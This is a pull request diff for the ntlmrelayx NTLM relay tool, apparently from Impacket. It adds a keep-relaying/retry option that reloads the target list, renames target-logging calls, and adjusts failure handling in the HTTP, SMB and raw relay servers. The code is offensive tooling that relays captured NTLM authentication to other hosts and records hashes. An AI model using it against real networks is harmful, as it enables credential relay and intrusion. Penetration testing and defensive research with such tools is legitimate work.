### PR TITLE
NTLMRelayX Multirelay fixes and behavioral changes

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -183,6 +183,7 @@ def start_servers(options, threads):
         c.setEnumLocalAdmins(options.enum_local_admins)
         c.setAddComputerSMB(options.add_computer)
         c.setDisableMulti(options.no_multirelay)
+        c.setRetries(options.enable_retries)
         c.setEncoding(codec)
         c.setMode(mode)
         c.setAttacks(PROTOCOL_ATTACKS)
@@ -291,6 +292,7 @@ if __name__ == '__main__':
     parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
 
     parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)')
+    parser.add_argument('--enable-retries', action="store_true", required=False, help='When the target list is exhausted, start over from the beginning.')
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -183,7 +183,7 @@ def start_servers(options, threads):
         c.setEnumLocalAdmins(options.enum_local_admins)
         c.setAddComputerSMB(options.add_computer)
         c.setDisableMulti(options.no_multirelay)
-        c.setRetries(options.enable_retries)
+        c.setKeepRelaying(options.keep_relaying)
         c.setEncoding(codec)
         c.setMode(mode)
         c.setAttacks(PROTOCOL_ATTACKS)
@@ -292,7 +292,7 @@ if __name__ == '__main__':
     parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
 
     parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)')
-    parser.add_argument('--enable-retries', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it')
+    parser.add_argument('--keep-relaying', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it')
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -292,7 +292,7 @@ if __name__ == '__main__':
     parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
 
     parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)')
-    parser.add_argument('--enable-retries', action="store_true", required=False, help='When the target list is exhausted, start over from the beginning.')
+    parser.add_argument('--enable-retries', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it')
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
     parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -407,14 +407,14 @@ class HTTPRelayServer(Thread):
                     if self.server.config.disableMulti:
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
                                   self.target.scheme, self.target.netloc))
-                        self.server.config.target.logTarget(self.target)
+                        self.server.config.target.registerTarget(self.target)
                         self.send_not_found()
                         return
                     else:
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
                             self.server.server_address[1], self.target.scheme, self.target.netloc))
 
-                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
+                        self.server.config.target.registerTarget(self.target, gotUsername=self.authUser)
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
 
                         if self.target is None:
@@ -454,7 +454,7 @@ class HTTPRelayServer(Thread):
                     # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
                     # which we don't want
                     if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
-                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
+                        self.server.config.target.registerTarget(self.target, gotUsername=self.authUser)
                         # No anonymous login, go to next host and avoid triggering a popup
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
                         if self.target is None:
@@ -491,7 +491,7 @@ class HTTPRelayServer(Thread):
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                               self.server.config.outputFile)
 
-                    self.server.config.target.logTarget(self.target, True, self.authUser)
+                    self.server.config.target.registerTarget(self.target, True, self.authUser)
                     self.do_attack()
                     if self.server.config.disableMulti:
                         # We won't use the redirect trick, closing connection...

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -368,6 +368,9 @@ class HTTPRelayServer(Thread):
                     LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
                         (self.server.server_address[1], self.authUser, self.client_address[0]))
                     self.send_not_found()
+                    if self.server.config.enableRetries:
+                        self.server.config.target.reloadTargets(full_reload=True)
+
                     return
 
                 LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
@@ -384,12 +387,22 @@ class HTTPRelayServer(Thread):
                         LOG.info("HTTPD(%s): Connection from %s controlled, but there are no more targets left!" % (
                             self.server.server_address[1], self.client_address[0]))
                         self.send_not_found()
+                        if self.server.config.enableRetries:
+                            self.server.config.target.reloadTargets(full_reload=True)
+
                         return
 
                     LOG.info("HTTPD(%s): Connection from %s controlled, attacking target %s://%s" % (
                         self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
 
-                if not self.do_ntlm_negotiate(token, proxy=proxy):
+
+                try:
+                    ntlm_negotiate_response = self.do_ntlm_negotiate(token, proxy=proxy)
+                except Exception as e:
+                    LOG.error('HTTPD(%d): Exception while Negotiating NTLM with %s://%s: "%s"' % (self.server.server_address[1], self.target.scheme, self.target.netloc, str(e)))
+                    ntlm_negotiate_response = False
+
+                if not ntlm_negotiate_response:
                     # Connection failed
                     if self.server.config.disableMulti:
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
@@ -401,13 +414,16 @@ class HTTPRelayServer(Thread):
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
                             self.server.server_address[1], self.target.scheme, self.target.netloc))
 
-                        self.server.config.target.logTarget(self.target)
+                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
 
                         if self.target is None:
                             LOG.info( "HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
                                 (self.server.server_address[1], self.authUser, self.client_address[0]))
                             self.send_not_found()
+                            if self.server.config.enableRetries:
+                                self.server.config.target.reloadTargets(full_reload=True)
+
                             return
 
                         LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
@@ -438,19 +454,25 @@ class HTTPRelayServer(Thread):
                     # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
                     # which we don't want
                     if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
-                        self.server.config.target.logTarget(self.target)
+                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
                         # No anonymous login, go to next host and avoid triggering a popup
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
                         if self.target is None:
                             LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
                                 (self.server.server_address[1], self.authUser, self.client_address[0]))
                             self.send_not_found()
+
+                            if self.server.config.enableRetries:
+                                self.server.config.target.reloadTargets(full_reload=True)
                             return
 
-                        LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
-                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        self.send_not_found()  # Stop relaying at first login fail, this matches the behavior of smbrelayserver
 
-                        self.do_REDIRECT()
+                        # Uncomment lines below to keep relaying after login failures
+                        # LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                        #     self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                        # self.do_REDIRECT()
                     else:
                         # If it was an anonymous login, send 401
                         self.do_AUTHHEAD(b'NTLM', proxy=proxy)
@@ -485,6 +507,10 @@ class HTTPRelayServer(Thread):
                         if self.target is None:
                             LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
                                 self.server.server_address[1], self.authUser, self.client_address[0]))
+
+                            if self.server.config.enableRetries:
+                                self.server.config.target.reloadTargets(full_reload=True)
+
 
                             # Return Multi-Status status code to WebDAV servers
                             if self.command == "PROPFIND":

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -368,7 +368,7 @@ class HTTPRelayServer(Thread):
                     LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
                         (self.server.server_address[1], self.authUser, self.client_address[0]))
                     self.send_not_found()
-                    if self.server.config.enableRetries:
+                    if self.server.config.keepRelaying:
                         self.server.config.target.reloadTargets(full_reload=True)
 
                     return
@@ -387,7 +387,7 @@ class HTTPRelayServer(Thread):
                         LOG.info("HTTPD(%s): Connection from %s controlled, but there are no more targets left!" % (
                             self.server.server_address[1], self.client_address[0]))
                         self.send_not_found()
-                        if self.server.config.enableRetries:
+                        if self.server.config.keepRelaying:
                             self.server.config.target.reloadTargets(full_reload=True)
 
                         return
@@ -421,7 +421,7 @@ class HTTPRelayServer(Thread):
                             LOG.info( "HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
                                 (self.server.server_address[1], self.authUser, self.client_address[0]))
                             self.send_not_found()
-                            if self.server.config.enableRetries:
+                            if self.server.config.keepRelaying:
                                 self.server.config.target.reloadTargets(full_reload=True)
 
                             return
@@ -462,7 +462,7 @@ class HTTPRelayServer(Thread):
                                 (self.server.server_address[1], self.authUser, self.client_address[0]))
                             self.send_not_found()
 
-                            if self.server.config.enableRetries:
+                            if self.server.config.keepRelaying:
                                 self.server.config.target.reloadTargets(full_reload=True)
                             return
 
@@ -510,7 +510,7 @@ class HTTPRelayServer(Thread):
                             LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
                                 self.server.server_address[1], self.authUser, self.client_address[0]))
 
-                            if self.server.config.enableRetries:
+                            if self.server.config.keepRelaying:
                                 self.server.config.target.reloadTargets(full_reload=True)
 
 

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -407,14 +407,14 @@ class HTTPRelayServer(Thread):
                     if self.server.config.disableMulti:
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
                                   self.target.scheme, self.target.netloc))
-                        self.server.config.target.logTarget(self.target)
+                        self.server.config.target.registerTarget(self.target)
                         self.send_not_found()
                         return
                     else:
                         LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
                             self.server.server_address[1], self.target.scheme, self.target.netloc))
 
-                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
+                        self.server.config.target.registerTarget(self.target, gotUsername=self.authUser)
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
 
                         if self.target is None:
@@ -454,7 +454,7 @@ class HTTPRelayServer(Thread):
                     # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
                     # which we don't want
                     if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
-                        self.server.config.target.logTarget(self.target, gotUsername=self.authUser)
+                        self.server.config.target.registerTarget(self.target, gotUsername=self.authUser)
                         # No anonymous login, go to next host and avoid triggering a popup
                         self.target = self.server.config.target.getTarget(identity=self.authUser)
                         if self.target is None:
@@ -492,7 +492,8 @@ class HTTPRelayServer(Thread):
                                               self.server.config.outputFile)
 
                     if not self.server.config.isADCSAttack:
-                        self.server.config.target.logTarget(self.target, True, self.authUser)
+                        self.server.config.target.registerTarget(self.target, True, self.authUser)
+
                     self.do_attack()
                     if self.server.config.disableMulti:
                         # We won't use the redirect trick, closing connection...

--- a/impacket/examples/ntlmrelayx/servers/rawrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/rawrelayserver.py
@@ -79,7 +79,7 @@ class RAWRelayServer(Thread):
                 # Connection failed
                 LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target',
                           self.target.scheme, self.target.netloc)
-                self.server.config.target.logTarget(self.target)
+                self.server.config.target.registerTarget(self.target)
 
             else:
 
@@ -132,7 +132,7 @@ class RAWRelayServer(Thread):
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                               self.server.config.outputFile)
 
-                    self.server.config.target.logTarget(self.target, True, self.authUser)
+                    self.server.config.target.registerTarget(self.target, True, self.authUser)
 
                     self.do_attack()
 

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -148,8 +148,8 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
-                if self.server.config.enableRetries:
-                    self.server.config.target.reloadTargets(full_reload=True)
+                if self.config.enableRetries:
+                    self.config.target.reloadTargets(full_reload=True)
 
                 return [SMB2Error()], None, STATUS_BAD_NETWORK_NAME
 
@@ -167,7 +167,7 @@ class SMBRelayServer(Thread):
                 client = self.init_client(extSec)
             except Exception as e:
                 LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target)
+                self.targetprocessor.logTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -302,7 +302,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.debug("Exception:", exc_info=True)
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target)
+                self.targetprocessor.logTarget(self.target, False, self.authUser)
                 # Raise exception again to pass it on to the SMB server
                 raise
 
@@ -429,8 +429,8 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
-                if self.server.config.enableRetries:
-                    self.server.config.target.reloadTargets(full_reload=True)
+                if self.config.enableRetries:
+                    self.config.target.reloadTargets(full_reload=True)
 
                 return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
 
@@ -504,8 +504,8 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
-                if self.server.config.enableRetries:
-                    self.server.config.target.reloadTargets(full_reload=True)
+                if self.config.enableRetries:
+                    self.config.target.reloadTargets(full_reload=True)
 
                 return [smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME
 
@@ -790,8 +790,8 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
-                if self.server.config.enableRetries:
-                    self.server.config.target.reloadTargets(full_reload=True)
+                if self.config.enableRetries:
+                    self.config.target.reloadTargets(full_reload=True)
 
                 return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
 
@@ -879,7 +879,8 @@ class SMBRelayServer(Thread):
     def init_client(self,extSec):
         if self.target.scheme.upper() in self.config.protocolClients:
             client = self.config.protocolClients[self.target.scheme.upper()](self.config, self.target, extendedSecurity = extSec)
-            client.initConnection()
+            if not client.initConnection():
+                raise Exception('Could not initialize connection')
         else:
             raise Exception('Protocol Client for %s not found!' % self.target.scheme)
 

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -167,7 +167,7 @@ class SMBRelayServer(Thread):
                 client = self.init_client(extSec)
             except Exception as e:
                 LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -302,7 +302,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.debug("Exception:", exc_info=True)
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
                 # Raise exception again to pass it on to the SMB server
                 raise
 
@@ -356,13 +356,13 @@ class SMBRelayServer(Thread):
             if errorCode != STATUS_SUCCESS:
                 #Log this target as processed for this client
                 LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
                 client.killConnection()
             else:
                 # We have a session, create a thread and do whatever we want
                 LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, True, self.authUser)
+                self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                     authenticateMessage['user_name'],
@@ -447,7 +447,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target, False, self.authUser)
+            self.targetprocessor.registerTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False
@@ -528,7 +528,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.error(
                     "Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -596,7 +596,7 @@ class SMBRelayServer(Thread):
                     challengeMessage = self.do_ntlm_negotiate(client,token)
                 except Exception:
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, False, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, False, self.authUser)
                     # Raise exception again to pass it on to the SMB server
                     raise
 
@@ -650,7 +650,7 @@ class SMBRelayServer(Thread):
                     LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                     #Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, False, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, False, self.authUser)
 
                     client.killConnection()
 
@@ -660,7 +660,7 @@ class SMBRelayServer(Thread):
                     LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, True, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                     ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                         authenticateMessage['user_name'],
@@ -725,7 +725,7 @@ class SMBRelayServer(Thread):
                 packet['ErrorClass']  = errorCode & 0xff
 
                 #Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
 
                 # Finish client's connection
                 #client.killConnection()
@@ -737,7 +737,7 @@ class SMBRelayServer(Thread):
                 LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, True, self.authUser)
+                self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'],
                                                     sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
@@ -808,7 +808,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target, False, self.authUser)
+            self.targetprocessor.registerTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -148,6 +148,9 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
+                if self.server.config.enableRetries:
+                    self.server.config.target.reloadTargets(full_reload=True)
+
                 return [SMB2Error()], None, STATUS_BAD_NETWORK_NAME
 
             LOG.info("SMBD-%s: Received connection from %s, attacking target %s://%s" % (connId, connData['ClientIP'], self.target.scheme,
@@ -352,8 +355,8 @@ class SMBRelayServer(Thread):
 
             if errorCode != STATUS_SUCCESS:
                 #Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target)
                 LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
+                self.targetprocessor.logTarget(self.target, False, self.authUser)
                 client.killConnection()
             else:
                 # We have a session, create a thread and do whatever we want
@@ -425,6 +428,9 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
+                if self.server.config.enableRetries:
+                    self.server.config.target.reloadTargets(full_reload=True)
+
                 return self.origsmb2TreeConnect (connId, smbServer, recvPacket)
 
             LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % (connId, self.authUser,
@@ -441,7 +447,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target)
+            self.targetprocessor.logTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False
@@ -497,6 +503,9 @@ class SMBRelayServer(Thread):
             if self.target is None:
                 LOG.info('SMBD-%s: Connection from %s controlled, but there are no more targets left!' %
                          (connId, connData['ClientIP']))
+                if self.server.config.enableRetries:
+                    self.server.config.target.reloadTargets(full_reload=True)
+
                 return [smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME
 
             LOG.info("SMBD-%s: Received connection from %s, attacking target %s://%s" % (connId, connData['ClientIP'],
@@ -519,7 +528,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.error(
                     "Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target)
+                self.targetprocessor.logTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -587,7 +596,7 @@ class SMBRelayServer(Thread):
                     challengeMessage = self.do_ntlm_negotiate(client,token)
                 except Exception:
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target)
+                    self.targetprocessor.logTarget(self.target, False, self.authUser)
                     # Raise exception again to pass it on to the SMB server
                     raise
 
@@ -641,7 +650,7 @@ class SMBRelayServer(Thread):
                     LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                     #Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target)
+                    self.targetprocessor.logTarget(self.target, False, self.authUser)
 
                     client.killConnection()
 
@@ -716,7 +725,7 @@ class SMBRelayServer(Thread):
                 packet['ErrorClass']  = errorCode & 0xff
 
                 #Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target)
+                self.targetprocessor.logTarget(self.target, False, self.authUser)
 
                 # Finish client's connection
                 #client.killConnection()
@@ -780,6 +789,9 @@ class SMBRelayServer(Thread):
                 # No more targets to process, just let the victim to fail later
                 LOG.info('SMBD-%s: Connection from %s@%s controlled, but there are no more targets left!' %
                          (connId, self.authUser, connData['ClientIP']))
+                if self.server.config.enableRetries:
+                    self.server.config.target.reloadTargets(full_reload=True)
+
                 return self.origsmbComTreeConnectAndX (connId, smbServer, recvPacket)
 
             LOG.info('SMBD-%s: Connection from %s@%s controlled, attacking target %s://%s' % ( connId, self.authUser,
@@ -796,7 +808,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target)
+            self.targetprocessor.logTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -167,7 +167,7 @@ class SMBRelayServer(Thread):
                 client = self.init_client(extSec)
             except Exception as e:
                 LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -302,7 +302,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.debug("Exception:", exc_info=True)
                 # Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
                 # Raise exception again to pass it on to the SMB server
                 raise
 
@@ -356,14 +356,15 @@ class SMBRelayServer(Thread):
             if errorCode != STATUS_SUCCESS:
                 #Log this target as processed for this client
                 LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
                 client.killConnection()
             else:
                 # We have a session, create a thread and do whatever we want
                 LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
                 # Log this target as processed for this client
+
                 if not self.config.isADCSAttack:
-                    self.targetprocessor.logTarget(self.target, True, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                 ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                     authenticateMessage['user_name'],
@@ -448,7 +449,7 @@ class SMBRelayServer(Thread):
             client = self.init_client(extSec)
         except Exception as e:
             LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-            self.targetprocessor.logTarget(self.target, False, self.authUser)
+            self.targetprocessor.registerTarget(self.target, False, self.authUser)
         else:
             connData['relayToHost'] = True
             connData['Authenticated'] = False
@@ -529,7 +530,7 @@ class SMBRelayServer(Thread):
             except Exception as e:
                 LOG.error(
                     "Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
             else:
                 connData['SMBClient'] = client
                 connData['EncryptionKey'] = client.getStandardSecurityChallenge()
@@ -597,7 +598,7 @@ class SMBRelayServer(Thread):
                     challengeMessage = self.do_ntlm_negotiate(client,token)
                 except Exception:
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, False, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, False, self.authUser)
                     # Raise exception again to pass it on to the SMB server
                     raise
 
@@ -651,7 +652,7 @@ class SMBRelayServer(Thread):
                     LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                     #Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, False, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, False, self.authUser)
 
                     client.killConnection()
 
@@ -661,7 +662,7 @@ class SMBRelayServer(Thread):
                     LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                     # Log this target as processed for this client
-                    self.targetprocessor.logTarget(self.target, True, self.authUser)
+                    self.targetprocessor.registerTarget(self.target, True, self.authUser)
 
                     ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                         authenticateMessage['user_name'],
@@ -726,7 +727,7 @@ class SMBRelayServer(Thread):
                 packet['ErrorClass']  = errorCode & 0xff
 
                 #Log this target as processed for this client
-                self.targetprocessor.logTarget(self.target, False, self.authUser)
+                self.targetprocessor.registerTarget(self.target, False, self.authUser)
 
                 # Finish client's connection
                 #client.killConnection()
@@ -738,7 +739,7 @@ class SMBRelayServer(Thread):
                 LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
 
                 # Log this target as processed for this client
